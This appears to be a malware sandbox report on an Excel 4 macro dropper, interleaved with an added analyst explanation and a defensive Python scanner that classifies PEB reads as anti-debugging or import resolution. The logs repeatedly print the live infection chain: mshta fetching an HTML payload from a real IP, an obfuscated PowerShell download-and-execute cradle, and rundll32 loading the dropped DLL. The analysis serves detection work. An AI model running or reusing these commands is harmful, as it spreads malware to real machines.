Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00304346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00305548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003209B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003081B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003051BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00317BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003213AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00309B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00314B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00307FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003059F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00316DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_003195FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00318BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0031DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00317DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00302BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00319BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00309DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0030E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0040044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003FF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_004020BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00404116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0040473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_004113AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F3C3C 15_2_003F3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_003F7C37 15_2_003F7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00406C49 15_2_00406C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00400E53 15_2_00400E53
Source: 476C.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: CJ68000754184.xls Macro extractor: Sheet name: REEEEEEEE
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0022E249 DeleteService, 13_2_0022E249
Source: CJ68000754184.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\CJ68000754184.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Jssipnq\
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe Code function: String function: 100359C1 appears 46 times
Source: CJ68000754184.xls OLE indicator, VBA macros: true
Source: CJ68000754184.xls.0.dr OLE indicator, VBA macros: true
Source: classification engine Classification label: mal100.troj.expl.evad.winXLS@21/9@2/48
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
Source: CJ68000754184.xls OLE indicator, Workbook stream: true
Source: CJ68000754184.xls.0.dr OLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc, 9_2_100125C0
Source: CJ68000754184.xls Virustotal: Detection: 13%
Source: CJ68000754184.xls ReversingLabs: Detection: 18%
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",rltAjgVv
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",NLOfvkgYs
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm",DllRegisterServer
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE436.tmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: >ystem.pdbW source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000006.00000002.677999523.0000000001D07000.00000004.00000020.00020000.00000000.sdmp
Source: 476C.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: C:\Windows\System32\mshta.exe Code function: 4_3_038808D0 push 8B49032Eh; iretd 4_3_038808D5
Source: C:\Windows\System32\mshta.exe Code function: 4_3_038800BE push 8B49032Eh; iretd 4_3_038800C4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10032B7D push ecx; ret 12_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10030DFF push ecx; ret 12_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x9130d

Persistence and Installation Behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Lpsbm\hfdnu.nlm:Zone.Identifier read attributes | delete
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_100134F0 IsIconic, 12_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 12_2_10018C9A
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Windows\System32\mshta.exe TID: 1976 Thread sleep time: -360000s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 % (2 identical entries)
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node (2 identical entries)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: rundll32.exe, 0000000D.00000002.620246507.00000000006FE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 12_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation (2 identical entries)

Anti Debugging

Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_00694087 mov eax, dword ptr fs:[00000030h] 9_2_00694087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00384087 mov eax, dword ptr fs:[00000030h] 10_2_00384087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001C4087 mov eax, dword ptr fs:[00000030h] 12_2_001C4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00234087 mov eax, dword ptr fs:[00000030h] 13_2_00234087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00314087 mov eax, dword ptr fs:[00000030h] 14_2_00314087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_00404087 mov eax, dword ptr fs:[00000030h] 15_2_00404087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10002280 SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,VirtualAlloc,VirtualAlloc,SetLastError,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,SetLastError, 9_2_10002280
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 9_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 9_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_1003ACCC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_10037657 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_10037657
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1002F81E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 12_2_1002F81E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003B89A SetUnhandledExceptionFilter,__encode_pointer, 12_2_1003B89A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003B8BC __decode_pointer,SetUnhandledExceptionFilter, 12_2_1003B8BC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_1003ACCC __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 12_2_1003ACCC
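Two different things are mixed in the list above. The IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess sequences and the __encode_pointer / __invoke_watson calls in the 0x1003xxxx range are Microsoft C runtime code (the /GS cookie-failure handler and CRT start-up) that almost every Visual C++ linked DLL carries, so on their own they are weak evidence of anti-debugging. The mov eax, dword ptr fs:[00000030h] entries are the part worth signing: the same offset 0x4087 shows up in six rundll32 instances at six different base addresses, so it is one unpacked module, and a load of the PEB pointer serves both debugger checks (PEB.BeingDebugged, PEB.NtGlobalFlag) and ordinary hash-based import resolution through PEB.Ldr, which the sandbox heuristic cannot tell apart. The Python below is an added example, not code from the report or from the sample: it scans a 32-bit code blob for the fs:[30h] encodings and labels each hit by the PEB field that is dereferenced next. The sample bytes are constructed for the example, the 16-byte look-ahead window and the mod=01/disp8 addressing forms are assumptions, and other routes to the PEB (fs:[18h] via the TEB, SIB forms) are not covered.

```python
"""Classify fs:[30h] PEB reads in a 32-bit code blob.

Added example, not code from the report or from the sample: the sandbox entry
"mov eax, dword ptr fs:[00000030h]" only says the PEB pointer was loaded; what
is read from it next decides whether it is a debugger check (BeingDebugged,
NtGlobalFlag) or plain API resolution through PEB->Ldr.
"""
import re

REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]  # ModRM reg order

# 64 A1 30 00 00 00        mov eax, fs:[30h]   (moffs32 short form, eax only)
# 64 8B /r 30 00 00 00     mov r32, fs:[30h]   (ModRM mod=00 rm=101 -> disp32)
FS30_RE = re.compile(
    rb"\x64(?:\xa1|\x8b([\x05\x0d\x15\x1d\x25\x2d\x35\x3d]))\x30\x00\x00\x00", re.DOTALL)

# First read made through the freshly loaded PEB pointer: mov/movzx r32, [reg+disp8]
FIELD_RE = re.compile(rb"(?:\x8b|\x0f\xb6|\x0f\xb7)([\x40-\x7f])(.)", re.DOTALL)

PEB_FIELDS = {0x02: "BeingDebugged", 0x0C: "Ldr", 0x18: "ProcessHeap", 0x68: "NtGlobalFlag"}
ANTI_DEBUG = {"BeingDebugged", "NtGlobalFlag"}


def _first_field_read(window: bytes, reg: int):
    """Return the PEB field name of the first [reg+disp8] read in window, if any."""
    for m in FIELD_RE.finditer(window):
        modrm, disp8 = m.group(1)[0], m.group(2)[0]
        if modrm & 7 == reg and disp8 in PEB_FIELDS:  # rm must be the PEB register
            return PEB_FIELDS[disp8]
    return None


def scan_peb_access(blob: bytes, base: int = 0, window: int = 16) -> list:
    """Find every fs:[30h] load and label it by what is dereferenced next."""
    hits = []
    for m in FS30_RE.finditer(blob):
        reg = 0 if m.group(1) is None else (m.group(1)[0] >> 3) & 7
        field = _first_field_read(blob[m.end():m.end() + window], reg)
        if field in ANTI_DEBUG:
            verdict = "anti-debug"
        elif field == "Ldr":
            verdict = "api-resolution"
        else:
            verdict = "unknown"
        hits.append({"va": base + m.start(), "reg": REGS[reg], "field": field, "verdict": verdict})
    return hits


# Constructed sample bytes (not taken from the report): three PEB loads, each
# followed by a different field read.
SAMPLE = (
    b"\x55\x8b\xec"                    # push ebp; mov ebp, esp
    b"\x64\xa1\x30\x00\x00\x00"        # mov eax, fs:[30h]
    b"\x0f\xb6\x40\x02"                # movzx eax, byte ptr [eax+2]   ; PEB.BeingDebugged
    b"\x85\xc0\x75\x05"                # test eax, eax ; jnz short
    b"\x64\x8b\x1d\x30\x00\x00\x00"    # mov ebx, fs:[30h]
    b"\x8b\x5b\x0c"                    # mov ebx, [ebx+0Ch]            ; PEB.Ldr
    b"\x8b\x73\x14"                    # mov esi, [ebx+14h]            ; InMemoryOrderModuleList
    b"\x64\x8b\x0d\x30\x00\x00\x00"    # mov ecx, fs:[30h]
    b"\x8b\x49\x68"                    # mov ecx, [ecx+68h]            ; PEB.NtGlobalFlag
    b"\xc3"                            # ret
)

if __name__ == "__main__":
    for h in scan_peb_access(SAMPLE, base=0x400000):
        print(f"{h['va']:#010x} {h['reg']:3s} -> {h['field']} ({h['verdict']})")
```

Run against the unpacked rundll32 modules listed under "Stealing of Sensitive Information" (the *.unpack dumps), the hits at RVA 0x4087 would be the ones to look at; a load that is followed by a PEB.Ldr walk is the normal Emotet-style import resolver, not an evasion, and only the BeingDebugged / NtGlobalFlag reads deserve the "anti-debugging" label.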

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/gg/ff/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/gg/ff/fe.html
